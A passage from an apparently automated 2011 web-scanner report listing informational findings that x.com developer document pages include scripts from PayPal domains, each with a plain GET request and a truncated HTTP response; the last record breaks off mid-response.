* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.142. https://www.x.com/docs/DOC-3371  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3371

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3371 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=131293 t=1313157237278257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.143. https://www.x.com/docs/DOC-3372  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3372

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337323b3130322c333337333b3130322c333337353b3130322c333235313b3130322c333337343b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=129449 t=1313157236932252
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.144. https://www.x.com/docs/DOC-3373  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3373

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3373 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=131465 t=1313157236591127
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.145. https://www.x.com/docs/DOC-3374  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3374

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337343b3130322c333235313b3130322c333432363b3130322c333337353b3130322c333433313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=102916 t=1313157236205992
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.146. https://www.x.com/docs/DOC-3375  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3375

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3375 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337353b3130322c333432373b3130322c333434333b3130322c333433313b3130322c333432363b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b3130322c333631393b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=172605 t=1313157234881833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.147. https://www.x.com/docs/DOC-3426  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3426

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3426 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432363b3130322c333434343b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333432373b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=177923 t=1313157233753621
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.148. https://www.x.com/docs/DOC-3427  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3427

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3427 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=115565 t=1313157233228654
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.149. https://www.x.com/docs/DOC-3431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3431

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333433313b3130322c333434343b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333536323b3130322c333631393b3130322c333638383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=173915 t=1313157234152384
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.150. https://www.x.com/docs/DOC-3443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3443

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3443 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434333b3130322c333631393b3130322c333638383b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=98914 t=1313157232773548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.151. https://www.x.com/docs/DOC-3444  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3444

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3444 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434343b3130322c333536313b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333536323b3130322c333834313b3130322c313631333b3130322c313035313b3130322c313033313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=100315 t=1313157231659068
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.152. https://www.x.com/docs/DOC-3491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3491

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3491 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333439313b3130322c333631393b3130322c333434343b3130322c333638383b3130322c333536313b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313035313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=218057 t=1313157232304538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.153. https://www.x.com/docs/DOC-3561  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3561

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3561 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536313b3130322c333834313b3130322c333638383b3130322c333631393b3130322c333536323b3130322c313631333b3130322c333831323b3130322c313035313b3130322c313033313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=135641 t=1313157231234077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.154. https://www.x.com/docs/DOC-3562  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3562

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3562 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536323b3130322c333638383b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313035313b3130322c333631393b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=175892 t=1313157230683229
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.155. https://www.x.com/docs/DOC-3619  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3619

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3619 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333631393b3130322c313631333b3130322c333831323b3130322c333834313b3130322c313035313b3130322c313033313b3130322c333638383b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=123460 t=1313157230328400
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.156. https://www.x.com/docs/DOC-3688  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3688

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3688 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333638383b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313033313b3130322c313035313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=147682 t=1313157229798103
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.157. https://www.x.com/docs/DOC-3811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3811 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:54 GMT; Path=/
Vary: User-Agent
JP: D=104592 t=1313156394128506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.158. https://www.x.com/docs/DOC-3811/delete  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811/delete

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-3811/delete HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=98952 t=1313157245116745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
